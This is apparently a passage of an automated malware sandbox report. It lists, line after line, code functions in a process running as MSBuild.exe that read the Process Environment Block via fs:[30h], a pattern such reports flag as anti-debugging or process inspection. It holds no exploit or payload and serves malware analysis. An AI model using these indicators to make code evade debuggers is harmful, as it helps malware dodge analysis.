Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov ecx, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010070C0 mov eax, dword ptr fs:[00000030h]	10_2_010070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106D0C0 mov eax, dword ptr fs:[00000030h]	10_2_0106D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0106D0C0 mov eax, dword ptr fs:[00000030h]	10_2_0106D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h]	10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h]	10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h]	10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB136 mov eax, dword ptr fs:[00000030h]	10_2_00FEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1131 mov eax, dword ptr fs:[00000030h]	10_2_00FF1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF1131 mov eax, dword ptr fs:[00000030h]	10_2_00FF1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C50D9 mov eax, dword ptr fs:[00000030h]	10_2_010C50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010720DE mov eax, dword ptr fs:[00000030h]	10_2_010720DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010190DB mov eax, dword ptr fs:[00000030h]	10_2_010190DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010150E4 mov eax, dword ptr fs:[00000030h]	10_2_010150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010150E4 mov ecx, dword ptr fs:[00000030h]	10_2_010150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010760E0 mov eax, dword ptr fs:[00000030h]	10_2_010760E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010320F0 mov ecx, dword ptr fs:[00000030h]	10_2_010320F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE92FF mov eax, dword ptr fs:[00000030h]	10_2_00FE92FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102A30B mov eax, dword ptr fs:[00000030h]	10_2_0102A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102A30B mov eax, dword ptr fs:[00000030h]	10_2_0102A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102A30B mov eax, dword ptr fs:[00000030h]	10_2_0102A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107930B mov eax, dword ptr fs:[00000030h]	10_2_0107930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107930B mov eax, dword ptr fs:[00000030h]	10_2_0107930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107930B mov eax, dword ptr fs:[00000030h]	10_2_0107930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01010310 mov ecx, dword ptr fs:[00000030h]	10_2_01010310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B132D mov eax, dword ptr fs:[00000030h]	10_2_010B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B132D mov eax, dword ptr fs:[00000030h]	10_2_010B132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101F32A mov eax, dword ptr fs:[00000030h]	10_2_0101F32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB2D3 mov eax, dword ptr fs:[00000030h]	10_2_00FEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB2D3 mov eax, dword ptr fs:[00000030h]	10_2_00FEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEB2D3 mov eax, dword ptr fs:[00000030h]	10_2_00FEB2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF92C5 mov eax, dword ptr fs:[00000030h]	10_2_00FF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF92C5 mov eax, dword ptr fs:[00000030h]	10_2_00FF92C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]	10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]	10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]	10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]	10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]	10_2_00FFA2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C5341 mov eax, dword ptr fs:[00000030h]	10_2_010C5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01072349 mov eax, dword ptr fs:[00000030h]	10_2_01072349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BA352 mov eax, dword ptr fs:[00000030h]	10_2_010BA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h]	10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h]	10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h]	10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107035C mov ecx, dword ptr fs:[00000030h]	10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h]	10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107035C mov eax, dword ptr fs:[00000030h]	10_2_0107035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AF367 mov eax, dword ptr fs:[00000030h]	10_2_010AF367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0109437C mov eax, dword ptr fs:[00000030h]	10_2_0109437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101438F mov eax, dword ptr fs:[00000030h]	10_2_0101438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0101438F mov eax, dword ptr fs:[00000030h]	10_2_0101438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C539D mov eax, dword ptr fs:[00000030h]	10_2_010C539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE826B mov eax, dword ptr fs:[00000030h]	10_2_00FE826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0104739A mov eax, dword ptr fs:[00000030h]	10_2_0104739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0104739A mov eax, dword ptr fs:[00000030h]	10_2_0104739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF4260 mov eax, dword ptr fs:[00000030h]	10_2_00FF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF4260 mov eax, dword ptr fs:[00000030h]	10_2_00FF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF4260 mov eax, dword ptr fs:[00000030h]	10_2_00FF4260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010233A0 mov eax, dword ptr fs:[00000030h]	10_2_010233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010233A0 mov eax, dword ptr fs:[00000030h]	10_2_010233A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010133A5 mov eax, dword ptr fs:[00000030h]	10_2_010133A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF6259 mov eax, dword ptr fs:[00000030h]	10_2_00FF6259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEA250 mov eax, dword ptr fs:[00000030h]	10_2_00FEA250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9240 mov eax, dword ptr fs:[00000030h]	10_2_00FE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9240 mov eax, dword ptr fs:[00000030h]	10_2_00FE9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE823B mov eax, dword ptr fs:[00000030h]	10_2_00FE823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AC3CD mov eax, dword ptr fs:[00000030h]	10_2_010AC3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010763C0 mov eax, dword ptr fs:[00000030h]	10_2_010763C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AB3D0 mov ecx, dword ptr fs:[00000030h]	10_2_010AB3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010003E9 mov eax, dword ptr fs:[00000030h]	10_2_010003E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AF3E6 mov eax, dword ptr fs:[00000030h]	10_2_010AF3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C53FC mov eax, dword ptr fs:[00000030h]	10_2_010C53FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0100E3F0 mov eax, dword ptr fs:[00000030h]	10_2_0100E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010263FF mov eax, dword ptr fs:[00000030h]	10_2_010263FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01027208 mov eax, dword ptr fs:[00000030h]	10_2_01027208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01027208 mov eax, dword ptr fs:[00000030h]	10_2_01027208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C5227 mov eax, dword ptr fs:[00000030h]	10_2_010C5227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]	10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]	10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]	10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]	10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]	10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FFA3C0 mov eax, dword ptr fs:[00000030h]	10_2_00FFA3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h]	10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h]	10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h]	10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF83C0 mov eax, dword ptr fs:[00000030h]	10_2_00FF83C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01078243 mov eax, dword ptr fs:[00000030h]	10_2_01078243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01078243 mov ecx, dword ptr fs:[00000030h]	10_2_01078243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102724D mov eax, dword ptr fs:[00000030h]	10_2_0102724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0107D250 mov ecx, dword ptr fs:[00000030h]	10_2_0107D250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AB256 mov eax, dword ptr fs:[00000030h]	10_2_010AB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010AB256 mov eax, dword ptr fs:[00000030h]	10_2_010AB256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BD26B mov eax, dword ptr fs:[00000030h]	10_2_010BD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010BD26B mov eax, dword ptr fs:[00000030h]	10_2_010BD26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE8397 mov eax, dword ptr fs:[00000030h]	10_2_00FE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE8397 mov eax, dword ptr fs:[00000030h]	10_2_00FE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE8397 mov eax, dword ptr fs:[00000030h]	10_2_00FE8397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01031270 mov eax, dword ptr fs:[00000030h]	10_2_01031270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01031270 mov eax, dword ptr fs:[00000030h]	10_2_01031270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01019274 mov eax, dword ptr fs:[00000030h]	10_2_01019274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEE388 mov eax, dword ptr fs:[00000030h]	10_2_00FEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEE388 mov eax, dword ptr fs:[00000030h]	10_2_00FEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FEE388 mov eax, dword ptr fs:[00000030h]	10_2_00FEE388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010A0274 mov eax, dword ptr fs:[00000030h]	10_2_010A0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01070283 mov eax, dword ptr fs:[00000030h]	10_2_01070283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01070283 mov eax, dword ptr fs:[00000030h]	10_2_01070283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_01070283 mov eax, dword ptr fs:[00000030h]	10_2_01070283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E284 mov eax, dword ptr fs:[00000030h]	10_2_0102E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102E284 mov eax, dword ptr fs:[00000030h]	10_2_0102E284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010C5283 mov eax, dword ptr fs:[00000030h]	10_2_010C5283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF7370 mov eax, dword ptr fs:[00000030h]	10_2_00FF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF7370 mov eax, dword ptr fs:[00000030h]	10_2_00FF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FF7370 mov eax, dword ptr fs:[00000030h]	10_2_00FF7370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102329E mov eax, dword ptr fs:[00000030h]	10_2_0102329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_0102329E mov eax, dword ptr fs:[00000030h]	10_2_0102329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h]	10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h]	10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h]	10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010052A0 mov eax, dword ptr fs:[00000030h]	10_2_010052A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010872A0 mov eax, dword ptr fs:[00000030h]	10_2_010872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010872A0 mov eax, dword ptr fs:[00000030h]	10_2_010872A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h]	10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010862A0 mov ecx, dword ptr fs:[00000030h]	10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h]	10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h]	10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h]	10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010862A0 mov eax, dword ptr fs:[00000030h]	10_2_010862A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9353 mov eax, dword ptr fs:[00000030h]	10_2_00FE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_00FE9353 mov eax, dword ptr fs:[00000030h]	10_2_00FE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h]	10_2_010B92A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 10_2_010B92A6 mov eax, dword ptr fs:[00000030h]	10_2_010B92A6
